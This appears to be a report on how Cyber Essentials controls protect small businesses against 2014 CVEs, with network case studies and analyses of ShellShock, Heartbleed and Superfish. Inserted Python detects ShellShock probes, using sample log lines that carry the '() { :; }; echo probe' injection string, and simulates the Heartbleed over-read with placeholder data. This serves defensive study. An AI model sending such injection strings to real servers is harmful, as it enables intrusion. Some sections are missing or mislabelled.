CVE-2014-1812  The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."

CVE-2014-2014  imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103  Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109  The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364  Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416  Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554  OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643  Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742  Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768  Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.

CVE-2014-2789  Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.

CVE-2014-2791  Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-2794  Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.

CVE-2014-2808  Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821  Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-3444  The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed .3gp file.

CVE-2014-3489  lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507  Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556  The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580  The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814  The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819  Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872  Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044  OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079  Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082  Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4100  Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105  Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114  Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."

CVE-2014-4127  Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4130  Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132  Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133  Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.

CVE-2014-4141  Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4481  Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617  The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies, and consequently obtain sensitive information, via a crafted URL.

CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."

CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.


Survey Responses



strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 116 were applicable to the second SME network.

Figure 10 SME-3 Vulnerability Mitigation

The requirement for web development SMEs to operate across multiple web browsers on various versions, to test and build a customer’s website, means that the network accumulates all vulnerabilities in web browsers. As this is a specialist case, a recommendation for web development organisations could be to use one up-to-date browser for general use. A bespoke policy may then be put in place.

When working on alternative browsers, employees should only access client pages where the developer has control of the web content.

SME Network Four - Hotel Services

Figure 11 SME-4 Network

Physical Infrastructure. This company is located at a single site and has equipment composed of a single desktop PC and 2 company laptops running on an ADSL router; this same router also provides the internet connection for the guests. An alternative router is available as a manual fall-back connection to the internet, but is available only to company equipment.

The guest network is split from the office network through secondary access point names, filtering traffic into a separate VLAN internal to the router.

Services. No local servers are present to provide any service to employees or guests on the network.

File storage is provided through on-line services including Dropbox and Skydrive. A standalone web server, owned and managed externally, runs the company website, and bookings are managed via a globally accessible website.

All the services are accessed with SSL-secured connections (HTTPS mainly).

User Access. User access is not mediated in any way, and any site can be accessed from any computer. Guests have no restrictions placed on their network usage either.

Operating systems. The company uses iOS for their mobile devices and Windows 8.1 for the office desktop and laptop PCs. Guests can bring their own equipment, so there will be a mix of all operating systems currently available, including Windows, Linux, Mac and others.

Existing Security Measures. Beyond the router’s separation between the guest and office networks, no other network security measures are in place. The office PCs do have automatic patch installation configured, however, and have the Kaspersky antivirus suite installed.

Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 103 were applicable to the second SME network.

Figure 12 SME-4 Vulnerability Mitigation

Similarly to SME 1, SME 4 requires the use of web browsers for bookings and reception of guests, so enables a wide variety of attack vectors through the web.

Thankfully, the services and servers they connect to are run by larger corporations, which will hopefully have implemented at least Cyber Essentials-grade security and protection, so the actual risks should be minimal.

For the purposes of this report, however, we assume that if this company has not implemented Cyber Essentials then the services they use must also not have, leaving them open to attack.

Survey Responses

Data gathered from survey responses affords a much broader look at the typical network deployments and practice in SMEs. The full results from 17 participants may be found in the Survey Responses section on page 27.

Physical Infrastructure. The majority of respondents belong to SMEs with 0-9 workstations on site; this is related to the size of an organisation, and could be considered representative of businesses across the UK.

Services. Local: File, Email, Database and Domain Servers are the most common local service providers, all present in more than a third of SMEs. Remote: Email, web hosting and file-sharing are the most common services provided remotely.

User Access. More than half of SMEs permit employees’ own devices to be used in the workplace; for organisations such as these it is important to ensure that employee machines receive the same level of protection as the rest of the work network, as one vulnerable machine allows vulnerability into the whole company.

Existing Security Measures. Of the survey respondents, most SMEs have a firewall, password policy and data-loss prevention scheme in place. These are the most common security measures in place for the SMEs contacted; below this is access control, malware protection and finally patch management, which is present in a little over half of organisations.

Almost two-thirds of survey participants were previously aware of Cyber Essentials.

Survey Respondents Network

The network built from Survey Respondents’ data considers the overall response in order to build a network easily adaptable to match that of the majority of SME network configurations.

Locally, Email and File servers have been represented, with domain controller capabilities represented in a network ADSL Router. Remotely, a web server is depicted, but remote services may also include database usage, email and other web services.


Figure 13 Adaptable Survey-Response Network

Typicality of Case-Study SMEs

Within the Survey Respondents’ network, aspects of each of the interviewed SME networks are apparent.

The Finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information will be likely to strongly consider using local file servers.

The Specialist SME shares with the survey respondents’ data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely from the workplace.

The Web Development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME’s own web-hosting solution rather than a client’s.

The Hotel Services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little-to-no online presence.


Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media in late 2014 to early 2015.

These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.

“ShellShock”

Also known by the name “BashDoor”, Shellshock hit the news as it attacked the Linux server environment, and did so in a particularly effective manner.

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

CVE-2014-6271[13]

The exploit allowed attackers to directly execute arbitrary shell commands on a compromised system by altering environment variables. However, the bug was not enough by itself to actually enable attackers to compromise a system, but allowed access via other services. While the exploit is only effective if the bash environment can be altered, the results can be devastating, as it lays bare the entire system to many other forms of attack.

The threat was particularly insidious for SMEs who used Linux/Unix based servers for services, mail servers as an example, as they would potentially have no idea that they had been compromised.
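The CVE text above names the mod_cgi route: a request header becomes an environment variable of the CGI process, and a vulnerable Bash runs whatever follows the function definition. An SME that runs its own web server can at least see whether it was probed. The following Python is an added example written for this page, not code from the report; it scans Apache combined-format log lines for the function-definition marker in the request line, Referer and User-Agent. The log lines, addresses and requests are constructed for the example and carry a harmless command after the marker.

```python
"""Detect ShellShock-style probes (CVE-2014-6271) in an Apache access log.

Added example, not code from the report.  Bash exports a function as an
environment variable whose value starts with "() {"; vulnerable versions
executed the text after the closing brace.  With mod_cgi, request headers
become such variables, so the marker in a logged header value is a probe.
"""
import re
from typing import Dict, List

# Function-definition marker followed by a command separator.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Apache "combined" format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (not real traffic): the marker sits in the User-Agent
# on one line and in the Referer on another; the command after it is harmless.
SAMPLE_LOG = """\
192.0.2.10 - - [25/Sep/2014:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.0.2.44 - - [25/Sep/2014:10:01:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; echo probe"
192.0.2.44 - - [25/Sep/2014:10:01:06 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { x; }; echo probe" "curl/7.37.0"
192.0.2.99 - - [25/Sep/2014:10:02:00 +0000] "GET /cgi-bin/status HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; scanner)"
"""


def find_shellshock(log_text: str) -> List[Dict[str, str]]:
    """Return one record per request whose request line, Referer or User-Agent carries the marker."""
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format: skip rather than guess at the fields
        for field in ("req", "ref", "ua"):
            if SHELLSHOCK_RE.search(m.group(field)):
                parts = m.group("req").split()
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "path": parts[1] if len(parts) > 1 else m.group("req"),
                    "field": field,
                    "value": m.group(field),
                })
                break  # one alert per request, even if several fields match
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['path']} [{hit['field']}] {hit['value']}")
```

Run over the sample, the two requests from 192.0.2.44 are reported and the ordinary browser and scanner lines are not; the marker pattern is the same one intrusion-detection signatures for this CVE key on, so a match in a log from before patching is a reason to treat the host as possibly compromised, which is the situation the paragraph above describes.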

“Heartbleed”

Appearing in April 2014, the CVE-2014-0160 (aka “Heartbleed”) bug allowed attackers to directly read the active memory of a target machine through a buffer over-read. This then allowed attackers to access private credentials (or indeed anything else) in the RAM of the target.

As described in the original CVE report:

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0160 [12]

As OpenSSL is a core part of many applications and services, both in the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.

Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as-yet-to-be-updated servers still online with the vulnerability) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on the individual deployments.

Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use, and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.

It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.
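The buffer over-read this section describes comes down to one missing comparison, and the 1.0.1g fix is that comparison. As an added illustration written for this page (not code from the report or from OpenSSL), the following Python models a heartbeat record in the RFC 6520 layout and the two behaviours side by side: the pre-fix responder trusts the length field inside the packet, the fixed responder checks it against the length actually received. The "process memory" and the secret placeholder lying behind the record are constructed inline; no real key material is involved.

```python
"""Toy model of the Heartbleed over-read and of the bounds check that fixed it.

Added example, not code from the report or from OpenSSL.  A heartbeat record
is laid out as in RFC 6520: type (1 byte), payload_length (2 bytes), payload,
then at least 16 bytes of padding.  "Process memory" is a constructed bytes
object: the received record followed by data that must never reach the peer.
"""
import struct
from typing import Optional, Tuple

HEARTBEAT_REQUEST = 1
MIN_PADDING = 16

# Constructed placeholder standing in for whatever sits after the record in RAM.
SECRET_TAIL = b"-----BEGIN PRIVATE KEY----- (constructed placeholder, not a real key)"


def build_record(payload: bytes, claimed_length: Optional[int] = None) -> bytes:
    """Encode a heartbeat request; claimed_length != len(payload) models a crafted packet."""
    length = len(payload) if claimed_length is None else claimed_length
    return struct.pack("!BH", HEARTBEAT_REQUEST, length) + payload + b"\x00" * MIN_PADDING


def vulnerable_respond(memory: bytes, record_length: int) -> bytes:
    """OpenSSL 1.0.1 before 1.0.1g: copies payload_length bytes as declared in the packet."""
    _hbtype, payload_len = struct.unpack("!BH", memory[:3])
    # record_length is never consulted: the copy runs past the record into adjacent memory.
    return memory[3:3 + payload_len]


def fixed_respond(memory: bytes, record_length: int) -> Optional[bytes]:
    """1.0.1g behaviour: silently discard the record unless the declared payload fits in it."""
    if record_length < 1 + 2 + MIN_PADDING:
        return None  # too short to hold even an empty payload plus padding
    _hbtype, payload_len = struct.unpack("!BH", memory[:3])
    if 1 + 2 + payload_len + MIN_PADDING > record_length:
        return None  # declared length exceeds what was actually received
    return memory[3:3 + payload_len]


def exchange(claimed_length: Optional[int]) -> Tuple[bytes, Optional[bytes]]:
    """Run one heartbeat through both responders and return (vulnerable_reply, fixed_reply)."""
    record = build_record(b"hello", claimed_length)
    memory = record + SECRET_TAIL
    return vulnerable_respond(memory, len(record)), fixed_respond(memory, len(record))


if __name__ == "__main__":
    print(exchange(None))  # honest request: both echo b"hello"
    print(exchange(60))    # crafted length: vulnerable reply leaks past the record, fixed reply is None
```

With an honest length both responders echo the five-byte payload; with a declared length of 60 the vulnerable responder returns 60 bytes that run through the padding into the placeholder "key", while the fixed responder returns nothing. The patch-management point of the section follows directly: the defence is entirely in the responder, so an SME whose TLS endpoint is operated by someone else cannot apply it.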

“Superfish”

The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers’ installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products.

CVE-2015-2077 [14]

This vulnerability is particularly interesting as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the ‘normal configuration’ for the equipment, it remained undetected for a long time, and hints that there may be further breaches in security as yet undiscovered in both Lenovo and other manufacturers’ equipment.

The vector is through the SuperFish software essentially breaking the chain of trust for SSL certificates by installing a self-signing certificate into the list of trusted certificates on the host machine. This allows an attacker to simply sign their own code via the same certificate, which itself can be easily gathered from any other machine running SuperFish, and they have full access to any SSL-secured connection from the target machine.

Thankfully, while the risks to users and SMEs were high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and is mitigated fully through the Cyber Essentials patch management advice.

Threat Analysis

ShellShock. Without Cyber Essentials in place, SME 1 and 2 would be at risk from ‘Shellshock’, as they both operate Unix/Linux based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and additionally unable to remedy it.

With Cyber Essentials, SME 1 and 2 would be fully protected, and it is likely that SME 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.

Heartbleed. The ‘Heartbleed’ bug is another vulnerability that, without Cyber Essentials guidelines being followed, would have laid companies’ external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines.

SuperFish. All of the SMEs we interviewed could be exceedingly vulnerable to the ‘Superfish’ issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the patch, rather than simply following ‘normal’ patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, then Cyber Essentials patch management fully mitigates this issue.


Conclusions

The Cyber Essentials Security Tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two hundred vulnerabilities collected, eight exploits were not able to be resolved with the deployment of security patches; for vulnerabilities such as these the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.

Scope. It is important to consider that the scope of this study covers only internet-based commodity-level attacks, and although the Cyber Essentials tools perform very well in mitigating these, this does not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least malicious acts but also users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.

Additional Tools

